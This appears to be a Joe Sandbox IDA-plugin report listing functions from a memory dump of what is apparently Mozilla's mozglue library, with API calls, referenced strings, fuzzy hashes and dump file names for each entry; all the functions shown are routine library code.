Instruction ID: caf233b3b6fe3a5d5797d50922318abb36f979c5285b1564b0b4a3bbc35eadd0
Opcode Fuzzy Hash: 714541ae9983c2b6a9725fc2f67a66405d06576e72719014d8e917aca64769a1
Instruction Fuzzy Hash: 9461E2759087069FC711CF18C48059AB3F5FF98369F148659EC999B702EB32E986CBC1

Function 6CA0DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6CA0DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6CA0D38A,?), ref: 6CA0DC6F
free.MOZGLUE(?,?,?,?,?,6CA0D38A,?), ref: 6CA0DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6CA0D38A,?), ref: 6CA0DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6CA0D38A,?), ref: 6CA0DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6CA0D38A,?), ref: 6CA0DD4A

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 31497593320b6dde22b977e2ca626dc278d5717a98de35c4054d6a39cca737cb
Instruction ID: aa474d6a40d4336b580ee8f491afda7790c7803af1f7252bc6530b098061c804
Opcode Fuzzy Hash: 31497593320b6dde22b977e2ca626dc278d5717a98de35c4054d6a39cca737cb
Instruction Fuzzy Hash: 8C4157B6B006068FCB00CFA9E88099AB7B6FF88358B654569D905ABB11D731FC44CB90

Function 6C9F6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C9EFA80: GetCurrentThreadId.KERNEL32 ref: 6C9EFA8D
Part of subcall function 6C9EFA80: AcquireSRWLockExclusive.KERNEL32(6CA3F448), ref: 6C9EFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9F6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C9F67C8

Part of subcall function 6CA04290: memcpy.VCRUNTIME140(?,?,6CA12003,6CA10AD9,?,6CA10AD9,00000000,?,6CA10AD9,?,00000004,?,6CA11A62,?,6CA12003,?), ref: 6CA042C4

Strings

data, xrefs: 6C9F6593

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data
API String ID: 511789754-2918445923
Opcode ID: 70dc367f8dceaf0fefa05e6d750f75c6675c81919f41b453f19b0c8b6aed235f
Instruction ID: 78a80cd0ef248ef56f48822e0f33cf45c6222d61978caf6950184b0646cffe72
Opcode Fuzzy Hash: 70dc367f8dceaf0fefa05e6d750f75c6675c81919f41b453f19b0c8b6aed235f
Instruction Fuzzy Hash: CDD1DE71A083408FD724DF28D850B9EB7E5AFE5308F14892DE599C7B51EB30E84ACB52

Function 6C9ED5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C9BEB57,?,?,?,?,?,?,?,?,?), ref: 6C9ED652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C9BEB57,?), ref: 6C9ED660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C9BEB57,?), ref: 6C9ED673
free.MOZGLUE(?), ref: 6C9ED888

Strings

|Enabled, xrefs: 6C9ED81E

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
Opcode ID: 4fe064e00073a6201c6f1162bd8730c139f22849fea459bd52fd143e5d9485e7
Instruction ID: 0082c57e9f9c2e63b9a1f9f495c1a7b6630acc66d49bb34d592f8582b2805487
Opcode Fuzzy Hash: 4fe064e00073a6201c6f1162bd8730c139f22849fea459bd52fd143e5d9485e7
Instruction Fuzzy Hash: ECA125B1A003458FDB16CF69C8907AEBBF4AFAD318F14805CD889AB741C735E845CBA1

Function 6C9EF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C9EF480

Part of subcall function 6C9BF100: LoadLibraryW.KERNEL32(shell32,?,6CA2D020), ref: 6C9BF122
Part of subcall function 6C9BF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C9BF132

CloseHandle.KERNEL32(00000000), ref: 6C9EF555

Part of subcall function 6C9C14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C9C1248,6C9C1248,?), ref: 6C9C14C9
Part of subcall function 6C9C14B0: memcpy.VCRUNTIME140(?,6C9C1248,00000000,?,6C9C1248,?), ref: 6C9C14EF

Part of subcall function 6C9BEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C9BEEE3

CreateFileW.KERNEL32 ref: 6C9EF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C9EF523

Strings

\oleacc.dll, xrefs: 6C9EF4CB

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: c8a773a28993a2cd62f420d34c5c6bfbbf7293fc2b75d6696b55b1d8661ca3a5
Instruction ID: 860ffc750f0f9c1d273c54d4faf8cc7524d5c7ad80198c57d0be42e88af50319
Opcode Fuzzy Hash: c8a773a28993a2cd62f420d34c5c6bfbbf7293fc2b75d6696b55b1d8661ca3a5
Instruction Fuzzy Hash: 9F41E4306087119FD321CF28D844AABB3F4AFA831CF104A1DF595C3690EB30D949CB92

Function 6CA174A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6CA17526
__Init_thread_footer.LIBCMT ref: 6CA17566
__Init_thread_footer.LIBCMT ref: 6CA17597

Strings

kernel32.dll, xrefs: 6CA17557
UnmapViewOfFile2, xrefs: 6CA17552

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 38db264b6d67efdf03325859410984d6d35a19b986ad4084265b42df6a2075fd
Instruction ID: 97aaa9adb133548d9233400540475e2008a6191968641ab41aa524c89aadcd07
Opcode Fuzzy Hash: 38db264b6d67efdf03325859410984d6d35a19b986ad4084265b42df6a2075fd
Instruction Fuzzy Hash: 82213D31704612ABCB289FA9DC28E953775FB56334B08915DE80DD7F40CB31E88385A5

Function 6CA1A7A0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6CA3F770,-00000001,?,6CA2E330,?,6C9DBDF7), ref: 6CA1A7AF
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,accelerator.dll,?,6C9DBDF7), ref: 6CA1A7C2
moz_xmalloc.MOZGLUE(00000018,?,6C9DBDF7), ref: 6CA1A7E4
LeaveCriticalSection.KERNEL32(6CA3F770), ref: 6CA1A80A

Strings

accelerator.dll, xrefs: 6CA1A7BF

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeavemoz_xmallocstrcmp
String ID: accelerator.dll
API String ID: 2442272132-2426294810
Opcode ID: a04043a705d0e940c42654dfa8d6f386c59a9f9898502a76c132e8784c271794
Instruction ID: f43de2f49a6707292065a68f98caf9e8502ce32cb2b3de0b6f3b85d015534f7c
Opcode Fuzzy Hash: a04043a705d0e940c42654dfa8d6f386c59a9f9898502a76c132e8784c271794
Instruction Fuzzy Hash: F9017C716143049F9B08CF59DC9882177B9FB8931570880AAE809CB751DB709D49CBA1

Function 6C9BF0A0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ole32,?,6C9BEE51,?), ref: 6C9BF0B2
GetProcAddress.KERNEL32(00000000,CoTaskMemFree), ref: 6C9BF0C2

Strings

ole32, xrefs: 6C9BF0AD
Could not find CoTaskMemFree, xrefs: 6C9BF0E3
Could not load ole32 - will not free with CoTaskMemFree, xrefs: 6C9BF0DC

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Could not find CoTaskMemFree$Could not load ole32 - will not free with CoTaskMemFree$ole32
API String ID: 2574300362-1578401391
Opcode ID: 2e21f6cfbf8154349044da4b56179cb07622f105d5cfa0043f841365a29d4dc3
Instruction ID: 0aca27d55f4f69e14c05c20a0aaac313bebcba002ccd5b7ea2cbad80b9b654f3
Opcode Fuzzy Hash: 2e21f6cfbf8154349044da4b56179cb07622f105d5cfa0043f841365a29d4dc3
Instruction Fuzzy Hash: 7DE0927D748713EF9F185AA66C2862777BD6B5210D310C12DE50AE1E50EB30D0518625

Function 6C9F0080 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C9C7204), ref: 6C9F0088
GetProcAddress.KERNEL32(00000000,CryptCATAdminAcquireContext2), ref: 6C9F00A7
FreeLibrary.KERNEL32(?,6C9C7204), ref: 6C9F00BE

Strings

CryptCATAdminAcquireContext2, xrefs: 6C9F00A1
wintrust.dll, xrefs: 6C9F0083

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminAcquireContext2$wintrust.dll
API String ID: 145871493-3385133079
Opcode ID: 52e0c5d6cde590850ef47cd6419cb1e225f75b48e74ac911c6b9d2a441161c31
Instruction ID: 841bf33eebb9a8fa7f4979ca33457dcbc5569cb44990fd8519750c59128f21cf
Opcode Fuzzy Hash: 52e0c5d6cde590850ef47cd6419cb1e225f75b48e74ac911c6b9d2a441161c31
Instruction Fuzzy Hash: 4DE0E5B02107029BDB2CAB699C2C7013AFDA70B344F14D159ED2CC2690D774C046CB11

Function 6C9F00D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(wintrust.dll,?,6C9C7235), ref: 6C9F00D8
GetProcAddress.KERNEL32(00000000,CryptCATAdminCalcHashFromFileHandle2), ref: 6C9F00F7
FreeLibrary.KERNEL32(?,6C9C7235), ref: 6C9F010E

Strings

CryptCATAdminCalcHashFromFileHandle2, xrefs: 6C9F00F1
wintrust.dll, xrefs: 6C9F00D3

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: CryptCATAdminCalcHashFromFileHandle2$wintrust.dll
API String ID: 145871493-2559046807
Opcode ID: 876b957afa5aa230b90e5b0b6368991178ecc37d06cde998a11fda974d45ebda
Instruction ID: 9c33aba46523b446dd7e1086b5af4b50900e99182b1183653e5acf3aa79661a3
Opcode Fuzzy Hash: 876b957afa5aa230b90e5b0b6368991178ecc37d06cde998a11fda974d45ebda
Instruction Fuzzy Hash: 61E01A703193079BEF2C9F699E2DB223AFDA702244F20D459ED1DC1680D770C0528B10

Function 6CA1C410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CA1C0E9), ref: 6CA1C418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6CA1C437
FreeLibrary.KERNEL32(?,6CA1C0E9), ref: 6CA1C44C

Strings

NtQueryVirtualMemory, xrefs: 6CA1C431
ntdll.dll, xrefs: 6CA1C413

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: 309004157db3af60b2fb69b84fee36a7b915c7249feb3eaf6bf18f755f2fbcbd
Instruction ID: 078b81ba39e761c2257632cb71cd53fcf096f8aa984e122dc55c8d4b57e1a587
Opcode Fuzzy Hash: 309004157db3af60b2fb69b84fee36a7b915c7249feb3eaf6bf18f755f2fbcbd
Instruction Fuzzy Hash: 39E01A702183129BDB2C6B759D2CB013AF8B706208F14C269AE0CC1690DB74C0468A10

Function 6CA175B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CA1748B,?), ref: 6CA175B8
GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6CA175D7
FreeLibrary.KERNEL32(?,6CA1748B,?), ref: 6CA175EC

Strings

ntdll.dll, xrefs: 6CA175B3
RtlNtStatusToDosError, xrefs: 6CA175D1

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: RtlNtStatusToDosError$ntdll.dll
API String ID: 145871493-3641475894
Opcode ID: 425f0d5b2b7fd04d1fbc51496fed3a62a224a68cd7d244587b83b674afdc4645
Instruction ID: 7835b3faa81f1069bc33153762edb0b20e7279df90191195f63302b4c2141c7c
Opcode Fuzzy Hash: 425f0d5b2b7fd04d1fbc51496fed3a62a224a68cd7d244587b83b674afdc4645
Instruction Fuzzy Hash: 87E01A71314303ABEB285FA5DD6C7013AF8EB02214F20D06ABD0CE1A80DB7480838F50

Function 6CA17600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6CA17592), ref: 6CA17608
GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6CA17627
FreeLibrary.KERNEL32(?,6CA17592), ref: 6CA1763C

Strings

ntdll.dll, xrefs: 6CA17603
NtUnmapViewOfSection, xrefs: 6CA17621

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtUnmapViewOfSection$ntdll.dll
API String ID: 145871493-1050664331
Opcode ID: b7848fc4df236f907062246cac4817bd64d2790fae9fb925db347aefa4e47658
Instruction ID: 1731746bf85203a7db08dd89a56643e8c450b4d864b894538bd62530c61ba253
Opcode Fuzzy Hash: b7848fc4df236f907062246cac4817bd64d2790fae9fb925db347aefa4e47658
Instruction Fuzzy Hash: 74E01A70214712ABDF285BA9EC2C7013AB8F706258F10D159ED0DD1A90E77580428B54

Function 6CA1BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?,?,6CA1BE49), ref: 6CA1BEC4
RtlCaptureStackBackTrace.NTDLL ref: 6CA1BEDE
memset.VCRUNTIME140(00000000,00000000,-00000008,?,6CA1BE49), ref: 6CA1BF38
RtlReAllocateHeap.NTDLL ref: 6CA1BF83
RtlFreeHeap.NTDLL(6CA1BE49,00000000), ref: 6CA1BFA6

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
String ID:
API String ID: 2764315370-0
Opcode ID: b5e2e2d61fd0228d8562d5e106ea31e02abc10a0cb3c3a08003d3d4a7d61fcb3
Instruction ID: 505ee8868e17c4848f6c681cd999321feb7f2722c8af43fb6cd1844667769ad8
Opcode Fuzzy Hash: b5e2e2d61fd0228d8562d5e106ea31e02abc10a0cb3c3a08003d3d4a7d61fcb3
Instruction Fuzzy Hash: 7C51C3B1A042018FE714DF69DD80B9AB3A2FF88314F298639D515A7F54D730F9868B80

Function 6CA08E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?,6CA2D734), ref: 6CA08E6E
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?,6CA2D734), ref: 6CA08EBF
free.MOZGLUE(?,?,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?), ref: 6CA08F24
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?,6CA2D734), ref: 6CA08F46
free.MOZGLUE(?,?,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?), ref: 6CA08F7A
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C9FB58D,?,?,?,?,?,?,?,6CA2D734,?,?,?), ref: 6CA08F8F

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: c6c96284196e8adc0fcac1cc3d02c9a48a29ad3240f0abba1bce4150230b244d
Instruction ID: e6cc3e8b2aad6808c239c93a12a5ee2351ebdc3aa9adfc295a3d60e14d3df474
Opcode Fuzzy Hash: c6c96284196e8adc0fcac1cc3d02c9a48a29ad3240f0abba1bce4150230b244d
Instruction Fuzzy Hash: 8F51DFB5B012168FEB14CF68E88076E73B2FF45348F29052AD916AB740E731F945CBA5

Function 6C9C60E0 Relevance: 7.6, APIs: 6, Instructions: 141COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C60F4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C6180
free.MOZGLUE(?,?,?,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C9C6211
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,00000000,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C9C6229
free.MOZGLUE(?,?,?,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C9C625E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C9C5FDE,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C9C6271

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652918035.000000006CA42000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9b0000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: e61bf209f969e28808819316876d2f63aa902a5cfffe8865b2261c698daafa5c
Instruction ID: 8d31db1ffece3b92916ac1d3ae4b7a1ee3852ff7e0fbedbbb272c5d2efa18a56
Opcode Fuzzy Hash: e61bf209f969e28808819316876d2f63aa902a5cfffe8865b2261c698daafa5c
Instruction Fuzzy Hash: B25156B1B002468BEB14CFA8D8907BEB7B5AB49308F204539C616D7711E731EA55CB63

Function 6CA027E0 Relevance: 7.6, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA0284D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA0289A
free.MOZGLUE(?,?,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA028F1
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA02910
free.MOZGLUE(00000001,?,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA0293C
free.API-MS-WIN-CRT-HEAP-L1-1-0(00200000,?,?,6CA02620,?,?,?,6C9F60AA,6C9F5FCB,6C9F79A3), ref: 6CA0294E

Memory Dump Source

Source File: 00000000.00000002.2652709984.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000000.00000002.2652657415.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652831963.000000006CA2D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2652884331.000000006CA3E000.00000004.00000001.01000000.00000008.sdmpDownload File
